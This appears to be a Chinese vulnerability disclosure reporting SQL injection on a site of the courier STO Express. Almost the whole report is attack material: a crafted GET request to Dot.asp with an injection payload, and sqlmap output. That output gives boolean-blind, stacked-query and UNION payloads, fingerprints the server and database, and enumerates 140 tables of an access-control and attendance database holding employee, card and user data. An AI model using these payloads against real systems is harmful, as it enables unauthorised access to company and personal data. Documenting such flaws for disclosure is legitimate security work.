申通快递某站存在SQL注入漏洞

GET /Dot.asp?Area=-1' OR 1=1* --  HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer:
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host:
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: :80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: :80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- --
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: :80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--  --
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]
+------------------------------+
| acc_antiback                 |
| acc_device                   |
| acc_door                     |
| acc_firstopen                |
| acc_firstopen_emp            |
| acc_holidays                 |
| acc_interlock                |
| acc_levelset                 |
| acc_levelset_door_group      |
| acc_levelset_emp             |
| acc_linkageio                |
| acc_map                      |
| acc_mapdoorpos               |
| acc_monitor_log              |
| acc_morecardempgroup         |
| acc_morecardgroup            |
| acc_morecardset              |
| acc_timeseg                  |
| acc_wiegandfmt               |
| action_log                   |
| areaadmin                    |
| att_attreport                |
| att_overtime                 |
| att_waitforprocessdata       |
| attcalclog                   |
| attexception                 |
| attparam                     |

| attrecabnormite              |
| attshifts                    |
| auth_group                   |
| auth_group_permissions       |
| auth_message                 |
| auth_permission              |
| auth_user                    |
| auth_user_groups             |
| auth_user_user_permissions   |
| base_additiondata            |
| base_appoption               |
| base_basecode                |
| base_datatranslation         |
| base_operatortemplate        |
| base_option                  |
| base_personaloption          |
| base_strresource             |
| base_strtranslation          |
| base_systemoption            |
| checkexact                   |
| checkinout                   |
| dbapp_viewmodel              |
| dbbackuplog                  |
| departments                  |
| deptadmin                    |
| devcmds                      |
| devcmds_bak                  |
| devlog                       |
| django_content_type          |
| django_session               |
| empitemdefine                |
| facetemplate                 |
| holidays                     |
| iclock                       |
| iclock_dininghall            |
| iclock_dstime                |
| iclock_notice                |
| iclock_oplog                 |
| iclock_testdata              |
| iclock_testdata_admin_area   |
| iclock_testdata_admin_dept   |
| leaveclass                   |
| leaveclass1                  |
| meeting_detailmeeting        |
| meeting_leave                |
| meeting_meetingemp           |
| meeting_meetingentity        |
| meeting_meetingexact         |
| meeting_meetingreport        |
| meeting_originalrecord       |
| meeting_room                 |
| meeting_room_devices         |
| meeting_statisticsmeeting    |
| meeting_type                 |
| meeting_validrecord          |
| num_run                      |
| num_run_deil                 |
| operatecmds                  |
| personnel_area               |
| personnel_cardtype           |
| personnel_cities             |
| personnel_countries          |
| personnel_education          |
| personnel_empchange          |
| personnel_iccard             |
| personnel_iccard_posmeal     |
| personnel_iccard_use_mechine |
| personnel_issuecard          |
| personnel_leavelog           |
| personnel_meal               |
| personnel_national           |
| personnel_positions          |
| personnel_state              |
| pos_allowance                |
| pos_allowancesetting         |
| pos_batchtime                |
| pos_carcashsz                |
| pos_carcashszbak             |
| pos_carcashtype              |
| pos_cardmanage               |
| pos_cardserial               |
| pos_errors                   |
| pos_handconsume              |
| pos_icconsumerlist           |
| pos_icconsumerlistbak        |
| pos_keydetail                |
| pos_keyvalue                 |
| pos_keyvalue_use_mechine     |
| pos_loseunitecard            |
| pos_merchandise              |
| pos_posdevlog                |
| pos_poslog                   |
| pos_replenishcard            |
| pos_splittime                |
| pos_splittime_use_mechine    |
| pos_storedetail              |
| pos_timebrush                |
| pos_timedetail               |
| pos_timeslice                |
| posparam                     |
| schclass                     |
| setuseratt                   |
| template                     |
| user_of_run                  |
| user_speday                  |
| user_temp_sch                |
| userinfo                     |
| userinfo_attarea             |
| useruusedsclasses            |
| worktable_groupmsg           |
| worktable_instantmsg         |
| worktable_msgtype            |
| worktable_usrmsg             |
+------------------------------+